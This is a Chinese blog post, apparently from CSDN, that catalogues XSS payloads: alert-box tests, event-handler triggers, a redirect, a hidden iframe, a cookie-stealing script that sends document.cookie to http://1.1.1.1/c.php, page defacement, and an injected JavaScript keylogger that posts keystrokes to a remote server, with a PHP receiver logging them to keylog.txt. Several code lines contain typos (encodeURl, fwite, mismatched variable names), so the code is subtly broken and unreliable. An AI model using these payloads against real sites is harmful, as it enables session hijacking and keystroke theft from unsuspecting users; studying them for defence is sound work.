xss漏洞

最新推荐文章于 2022-04-12 11:30:12 发布
最新推荐文章于 2022-04-12 11:30:12 发布
阅读量2.3k 收藏 6
点赞数 7
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51855956/article/details/115027935
版权

XSS

xss(跨站脚本攻击),是最常见的web应用安全漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript.

漏洞PoC
检测漏洞
.<script>alert ( 'xss')</script>
显示窗口显示xxs

. <a href=" onclick=alert('xss')>type</a>
显示链接名type,点击链接显示窗口xxs

. <img src=http:/ /1.1.1.1/a.ipg onerrar=alert ('xss')>
http:/ /1.1.1.1/a.ipg执行错误后显示窗口xxs

使用漏洞
. <script>window.location='http://1.1.1.1'</script>
重定向,执行后跳转到http://1.1.1.1
也可将网址改为本地ip进行监听

. <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe>
非js代码,与上一条作用相同

. <script>new Image().src="http://1.1.1.1/c.php?output="+document.cookie;</script>
读取当前页面的cookie值发送到=http://1.1.1.1/c.php

.<script> document.body.innerHTML="<div style=visibility:visible;>h1>THISWEBSITE IS UNDER ATTACK</h1></div>";</script>
执行后在页面显示THISWEBSITE IS UNDER ATTACK

利用js代码触发的几种方法:
<img src='./图片名.jpg' onmouseover='alert(/xss/)'>
引入一张图片(图片可不存在),然后鼠标悬停在图片上的时候,会触发XSS代码
<input type="text" onkeydown="alert(/xss/)">
点击键盘上任意一个按键的时候触发

<input type="text" onkeyup="alert(/xss/)">
输入一个字符后自动重复

<input type="button" onmouseover='alert(/xss/)'>
点击按钮触发

<img src='#' onerror='alert(/xss/)'>
发生错误时触发xss代码

伪协议:
使用javascript: 伪协议的方法构造xss
javascript:alert(/xss/);

<a href="javascript:alert(/xss/)">aaa</a>

使用xss监听
作用:可接受到被攻击方所敲击的键
注入:

<script+src="http://1.1.1.1/keylogger.js"></script>

跳转到http://1.1.1.1执行keylogger.js

代码keylogger.js:

Document.onkeypress = function(evt){
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key){
var http = new XMLHttpRequest();
var param = encodeURl(key)
http.open("POST","http://192.168.20.8/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
	}
}

接收方:

<?php
$key=$_POST['key];
$loafile="keylog.txt";
$fp = fopen($logfile, "a");
fwite($fp,$key);
fclose($fg);
?>

内容储存在IP为1.1.1.1下的keylog.txt文件下

加载成功中
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
XSS漏洞
weixin_54475242的博客
03-20 548
XSS漏洞 XSS漏洞 十大漏洞之一 Xss被称为跨站脚本攻击,xss通过将精心构造的代码(JS)代码注入到网页,并由浏览器解释运行这段JS代码,达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 XSS的对象是用户和浏览器。微博,留言板,聊天室等等收集用户输入的地方,都有可能被注入XSS代码,都存在遭受XSS的风险,只要没有对用户的输入进行严格过滤,就会被XSS。 攻击者将恶意代码注入到服务器中 用户在没有防备的情况下
XSS跨站脚本漏洞(绕过篇)
嚴 帅的博客
05-07 1684
前面我们提到XSS,对于一个基本的XSS漏洞页面,它发生的原因往往是从用户输入的数据到输出没有有效的过滤,就比如下面的这个范例代码。 <?php $a = $_GET['a']; echo $a; ?> 对于这样毫无过滤的页面,我们可以使用一些简单的恶意脚本即可完成攻击,但是事实上,为了应付XSS的攻击,我们会采用黑名单技术对一些特殊字符进行过滤,包括一些敏感的函数。但是这样一来...
开源 Web 应用最常见漏洞XSS 和 SQLI 漏洞
weixin_34314962的博客
06-06 181
Web应用程序安全公司Netsparker使用他们的自动化安全扫描工具,对396 个Web应用程序进行了扫描,发现了269个安全漏洞,其中最多的漏洞是跨站点脚本(XSS)和SQL注入(SQLI)漏洞,占到全部漏洞数量的87%,其中甚至还有多个零日漏洞。 对每个漏洞类别细分,研究人员发现了180个 XSS漏洞,如反射XSS,存储XSS等等,占到全部漏洞的6...
XSS 跨站脚本漏洞 - 学习
weixin_47306547的博客
09-17 2991
XSS简介 XSS又叫CSS(Cross Site Scripting),即跨站脚本攻击,时最常见的 Web 应用程序安全漏洞之一,在 2013 年度 Owasp top 10 中排名第三。 XSS时指攻击者在网页中嵌入客户端脚本,通常是 JavaSCript 编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。 综上可知,XSS属于客户端攻击,受害者最终是用户,但是这并不意味着XSS与自己的网站,服务器安全无关。须知,网站管理员也是用户之一,这意味着XSS
XSS攻击介绍(一)】
热门推荐
qq_55213436的博客
04-12 2万+
一、前言 XSS:跨站脚本攻击,即CSS。利用网页开发时留下的漏洞(web应用程序对用户的输入过滤不足),巧妙的将恶意的代码注入到网页中,使用户浏览器加载并执行恶意制造的代码,以达到攻击的效果。这恶意的代码通常是JS代码,但实际上也可以是JAVA、VBS、ActiveX、Flash或者是普通的HTML。(浏览器不会判断,只要是符合解析,那么就会执行恶意的代码)。可能存在XSS的地方:微博、留言板、聊天室等收集用户输入的地方都可能遭受XSS攻击的风险。只要你对用户的输入没有严格过滤。 ...
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
XSS漏洞挖掘与安全防护.pdf
08-08
XSS(Cross Site Scripting,跨站脚本攻击)是一种常见...在本议题中,XSS漏洞的深入浅出介绍将围绕形成机制、攻击手段和防御策略等方面展开,强调开发过程中如何避免和减少XSS漏洞的风险,保障Web应用的安全稳定运行。
SQL+XSS漏洞修复方案
04-13
总之,SQL注入和XSS漏洞的修复需要开发者具备良好的安全意识,并在编程时遵循最佳实践。通过使用预编译语句、输入验证和内容转义,我们可以大大降低这些风险,保护用户的个人信息和系统的完整性。在实际项目中,定期...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
xss漏洞jar.rar
09-29
跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。 我们常常听到“注入”...可以通过导入以下两个jar,通过配置实现xss漏洞修复,无需修改代码
gnuboard xss漏洞1
08-03
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器上执行恶意脚本。XSS攻击通常发生在Web应用程序未能充分验证或转义用户输入的数据时,使得这些数据可以被当作...
<img src="javascript:alert(/xss/)">已经慢慢过时了的
stilling2006的专栏
03-24 7493
我在一年前就发现类似这种语句已经不能在IE7.0以上和火狐运行,而旧版的遨游和其他的一些IE内核浏览器还可以,估计是被开发人员故意封掉的。随着浏览器的更新换代,这种语句的成功率越来越低,我在网上找到一些新文章仍还是在使用。 建议还是早点习惯吧,这种方式绝大部分浏览器都可以执行。。
XSS漏洞的简介和利用
m0_46397814的博客
08-08 1256
跨站脚本攻击
XSS攻击——从不知道xss到稍微知道xss
净邪的博客
05-31 1760
什么是XSS? 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 XSS主要拼接的是什么? SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss能做什么? 盗取Cookie(用的最频繁的) 获取内网ip 获取浏览器保存的明文密码 截取网页屏幕 网页上...
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值